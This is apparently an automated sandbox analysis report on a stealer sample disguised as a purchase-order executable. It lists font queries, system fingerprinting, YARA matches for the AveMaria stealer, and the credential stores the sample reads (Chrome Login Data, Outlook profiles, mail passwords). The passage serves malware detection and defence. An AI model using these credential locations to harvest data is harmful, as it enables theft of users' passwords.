Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_0040F93F cpuid

4_2_0040F93F

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_3_046997E0 GetSystemTime,GetCurrentProcessId,GetTickCount,QueryPerformanceCounter,

4_3_046997E0

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_3_046F73C6 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

4_3_046F73C6

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_3_046994E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,

4_3_046994E0

Lowering of HIPS / PFW / Operating System Security Settings:

Increases the number of concurrent connection per server for Internet Explorer

Show sources

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Jump to behavior

Stealing of Sensitive Information:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.3fccb60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.400c580.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.327703338.00000000015C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327531363.00000000015CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327638100.00000000015C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327579370.00000000015B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327676957.00000000015CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327479352.00000000015A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327512166.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Contains functionality to steal e-mail passwords

Show sources

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: POP3 Password	4_2_0040A29A
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: SMTP Password	4_2_0040A29A
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: IMAP Password	4_2_0040A29A

Contains functionality to steal Chrome passwords or cookies

Show sources

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: \Google\Chrome\User Data\Default\Login Data		4_2_0040C1B2
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: \Chromium\User Data\Default\Login Data		4_2_0040C1B2

Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.3fccb60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.400c580.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.327703338.00000000015C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327531363.00000000015CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327638100.00000000015C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327579370.00000000015B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327676957.00000000015CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327479352.00000000015A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327512166.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ADJUSTED PO3917NOV.exe PID: 5404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ADJUSTED PO3917NOV.exe PID: 1328, type: MEMORYSTR

Remote Access Functionality:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.3fccb60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack, type: UNPACKEDPE
